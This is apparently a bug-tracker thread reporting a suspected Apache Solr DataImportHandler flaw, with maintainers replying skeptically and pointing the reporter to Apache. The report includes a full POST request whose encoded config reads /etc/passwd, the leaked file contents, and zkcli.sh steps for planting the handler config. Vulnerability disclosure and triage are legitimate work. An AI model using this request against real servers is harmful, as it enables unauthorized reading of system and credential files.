solr dataimporthandler lead to data export when the debug and verbose switch is on. a remote hacker can turn on the dataimporthandler with some config file. As we all know, the data import feature can import any file, if this feature is not enabled, we can turn the feature by modifying the configuration file, do the steps described here. This file can also be a sensitive file system, such as /etc/passwd, and solr system provides debugging, open it to get sensitive information, the following information is the request: POST /solr/gettingstarted_shard1_replica2/dataimport HTTP/1.1 ..... command=full-import&clean=true&commit=true&debug=true&wt=json&indent=true&verbose=true&optimize=false&dataConfig=%3CdataConfig%3E%0A++++%3CdataSource+type%3D%22BinFileDataSource%22+%2F%3E%0A++++%3Cdocument%3E%0A++++++++%3Centity+name%3D%22tika-test%22+processor%3D%22TikaEntityProcessor%22%0A++++++++++++++++url%3D%22%2Fetc%2Fpasswd%22+format%3D%22text%22%3E%0A++++++++++++++++%3Cfield+column%3D%22text%22+name%3D%22text%22%2F%3E%0A++++++++%3C%2Fentity%3E%0A++++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A we can get the response: HTTP/1.1 200 OK Content-Type: text/plain; charset=UTF-8 Content-Length: 2917 { "responseHeader":{ "status":0, "QTime":482}, "initArgs":[ "defaults",[ "config","solr-data-config.xml"]], "command":"full-import", "mode":"debug", "documents":[], "verbose-output":[ "entity:tika-test",[ "document#1",[ "query","/etc/passwd", "time-taken","0:0:0.0", null,"----------- row #1-------------", "text","root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nolog.............................
Thanks liaoxini for reporting this issue. I think the Solr Java process would only have access to read files which it's Unix user has access to. Therefore if you have access to the filesystem to modify configuration you could just read the /etc/passwd file without solr. Could you provide more details about how a remote hacker could "can turn on the dataimporthandler with some config file"? If it's possible to modify configuration remotely, that could be a security issue.
I'm sorry, I forgot the steps how to turn dataimporter function remotely. The first step: ./ server / scripts / cloud-scripts / zkcli.sh -zkhost 192.168.3.105:9983 -cmd getfile /configs/solr/solrconfig.xml solrconfig.xml add the following: <lib dir = "$ {solr.install.dir: ../../../../ dist}"> regex = ".. solr-dataimporthandler - * \ jar" /> <requestHandler name = "/ dataimport" class = "solr.DataImportHandler"> <lst name = "defaults"> <str name = "config"> solr-data-config.xml </ str> </ lst> </ requestHandler> then upload Step 2: Upload solr-data-config.xml, which reads as follows: <dataConfig> <dataSource type = "BinFileDataSource" /> <document> <entity name = "tika-test" processor = "TikaEntityProcessor" url = "/ etc / passwd" format = "text"> <field column = "text" name = "text" /> </ entity> </ document> </ dataConfig> ./server/scripts/cloud-scripts/zkcli.sh -zkhost 192.168.3.105:9983 -cmd putfile /configs/gettingstarted/solr-data-config.xml solr-data-config.xml step 3: from web interface, press reloads, reload the configuration. step 4: send post request
After install the 'solr' package on Fedora 22, and 23, I don't see the zkcli.sh command. There are the files installed: [root@336a10ac27fb /]# rpm -ql solr /usr/share/doc/solr /usr/share/doc/solr/CHANGES.txt /usr/share/doc/solr/README.txt /usr/share/java/solr /usr/share/java/solr/solr-analysis-extras.jar /usr/share/java/solr/solr-cell.jar /usr/share/java/solr/solr-core.jar /usr/share/java/solr/solr-dataimporthandler-extras.jar /usr/share/java/solr/solr-dataimporthandler.jar /usr/share/java/solr/solr-langid.jar /usr/share/java/solr/solr-solrj.jar /usr/share/java/solr/solr-test-framework.jar /usr/share/java/solr/solr-uima.jar /usr/share/java/solr/solr-velocity.jar /usr/share/licenses/solr /usr/share/licenses/solr/LICENSE.txt /usr/share/licenses/solr/NOTICE.txt /usr/share/maven-metadata/solr.xml /usr/share/maven-poms/solr/lucene-solr-grandparent.pom /usr/share/maven-poms/solr/solr-analysis-extras.pom /usr/share/maven-poms/solr/solr-cell.pom /usr/share/maven-poms/solr/solr-contrib-aggregator.pom /usr/share/maven-poms/solr/solr-core.pom /usr/share/maven-poms/solr/solr-dataimporthandler-extras.pom /usr/share/maven-poms/solr/solr-dataimporthandler.pom /usr/share/maven-poms/solr/solr-langid.pom /usr/share/maven-poms/solr/solr-parent.pom /usr/share/maven-poms/solr/solr-solrj.pom /usr/share/maven-poms/solr/solr-test-framework.pom /usr/share/maven-poms/solr/solr-uima.pom /usr/share/maven-poms/solr/solr-velocity.pom Can you check you make sure you obtained Solr from the Fedora repositories? [root@336a10ac27fb /]# dnf provides solr solr-4.10.3-3.fc22.noarch : Ultra-fast Lucene-based Search Server Repo : fedora If you've obtained Solr directly from Apache, I'd suggest you contact Apache about this issue via security.